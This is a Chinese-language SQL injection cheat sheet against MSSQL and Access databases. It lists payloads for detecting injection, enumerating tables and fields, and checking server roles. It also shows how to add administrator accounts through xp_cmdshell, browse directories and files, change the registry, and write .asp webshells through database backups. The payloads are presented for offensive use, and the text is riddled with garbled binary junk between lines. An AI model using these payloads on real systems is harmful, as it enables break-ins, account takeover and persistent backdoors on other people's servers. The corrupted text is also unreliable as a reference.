1.判断是否有注入;and 1=1 ;and 1=2 K`Vi5h�R~c
2.初步判断是否是mssql ;and user>0 /�p}^�Tpu�
kz��cl��
�
3.注入参数是字符'and [查询条件] and ''=' Z]jm.'@z@
5R"i�F+p�4
4.搜索时没过滤参数的'and [查询条件] and '%25'=' W^v3pH-y�#
2Sz?r d,0f
5.判断数据库系统 Bs:INvhY�W
��R9xhO!��
;and (select count(*) from sysobjects)>0 mssql �#0GvL=}�k
�g
67;O�(3
;and (select count(*) from msysobjects)>0 access ~�|�QhWgq�
Wo+fM�n(�O
ER-X1f��D�
�Rw-!�P>S$
6.猜数据库 ;and (select Count(*) from [数据库名])>0 gE;r;#Jt4
[+j��}:�u�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 SoC3)�iqv/
%�PW�_v~sg
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2)�cq��!Zv
2�SVBuV�/R
9.(1)猜字段的ascii值(access) }M*yE]LL;Z
�Zgarx�V*
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^/b3_�aM5d
'~{bq'�7`m
(2)猜字段的ascii值(mssql) M�^S �<G��
:rR)�r��j'
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �xL&M�8�:�
#k?uY�g8�
10.测试权限结构(mssql) �(]ToBju��
\2]M�&n GT
q��D�!qS�M
�����F/.nr
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- s
aY;[�bz}
)�)�ArM-02
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ]�l/ �Py�X
�^E-BB 6D�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 3�}�hJ`x�Q
o�A+/F�]XJ
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- G�P<P���U�
��CvkZ<i){
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- :Q]P�=-Y8
�$DS�|jnpV
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- meJ%���mY�
X3mHg5�zt�
;and 1=(select IS_MEMBER('db_owner'));-- csK�;�GSp}
,y5,+:Y�
~
�P-�]u&m/6
�bSJ@�
5qS
11.添加mssql和系统的帐户 ,#�?iu?i/�
^�W#1�61&�
;exec master.dbo.sp_addlogin username;-- �Z�/G`8�|A
;exec master.dbo.sp_password null,username,password;-- 8=k��IN-l_
7F$G.LhMw�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �2;2FyKF�(
^�?�<gz!(-
;exec master.dbo.xp_cmdshell 'net user username password h�$`z��uz
05SK$
Y�<<
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- h[�*:\P��`
q#��C;i�K4
;exec master.dbo.xp_cmdshell 'net user username password /add';-- %7}ib�z4iF
?�2q4dx��0
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �>8;EeR�vI
>>nO�S]�UL
�C"��7-lz�
yX7�P5c. �
12.(1)遍历目录 �fmg�Xh)�=
CqFk(Td9-D
;create table dirs(paths varchar(100), id int) ag02=�}Q'r
�2e_�m��>I
;insert dirs exec master.dbo.xp_dirtree 'c:\' #EG$HX]���
�w�a�1Q��t
;and (select top 1 paths from dirs)>0 �y\?�NB:=%
9@3cz_�[J�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) %r
=9,��IJ
0^(�'�hS�&
omu�)�s
'8
x�u<oQBt��
(2)遍历目录 �\0fS;Q^{j
z ?L]5m`�H
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- }e��b�u@)r
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 "��rVf{��
OrP�i ("�/
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 BWF�>;*Xro
!�FA[
]d�4
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �u;�G-��46
�2QIx~Er�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Ci9]#)�"c�
K3dg.�>�O�
Wz��hY4"p�
�rK~�O��bv
13.mssql中的存储过程 I�eN~�E�'~
�[6cF#�_)*
xp_regenumvalues 注册表根键, 子键 l�Y�$9�-Q(
7��MZ�(tOR
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �32�8�gTP1
CpLLsp�h�y
xp_regread 根键,子键,键值名 q�w<~v?{|C
iy-~CPNB_�
;exec xp_regread T/$hN hQK�
�F�KWL�{"y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 wN]�]t~K)Q
'�5etZ!�:�
xp_regwrite 根键,子键, 值名, 值类型, 值 1fMl8[!JLu
D}T+X�;u)K
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 It#T��\fU�
=w�q�uFA!c
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ;�%�^T*?t�
��Uy�s[0�n
xp_regdeletevalue 根键,子键,值名 ~�5:�-;ZbZ
<�wT�D}.n�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 0�#�:���St
wOV}�<.W
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 k#"}oI{<
6
:{=2ih-}�
W�[B;�;"ro
R>�B�4v+b�
14.mssql的backup创建webshell �`xsU'Wd^<
*pSD[�E>SU
use model dV7~C@k6k8
���ydMfV�-
create table cmd(str image); �7N8a4�8$8
��D`
a�bVf
insert into cmd(str) values (''); ,�V`�[;~49
I*�4g� ;1x
backup database model to disk='c:\l.asp'; fI }v}��L^
dQ-�:�]T (
k�)TNmpL%"
,M0�#?�j�>
15.mssql内置函数 9{&oV�t~Y$
`�nv82��v�
;and (select @@version)>0 获得Windows的版本号 4l?�"�zv1�
/SKgN{tW�e
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �J_7&nI�H7
t|]2\6acuc
;and (select user_name())>0 爆当前系统的连接用户 N
V�B��WF
d9�pZ�g=$8
;and (select db_name())>0 得到当前连接的数据库 tdi^�e;:�?
QLD��l��d[
V9/�P�k�uT
v%��8S:�3�
16.简洁的webshell {w�52]5��l
��bCmlSu
use model q3e^�vMK"
:\69N/�uw`
create table cmd(str image); �rvE�T�t��
?�bw1zYP��
insert into cmd(str) values (''); J_��N`D+m�
ZnZ`/zN��O
backup database model to disk='g:\wwwtest\l.asp';
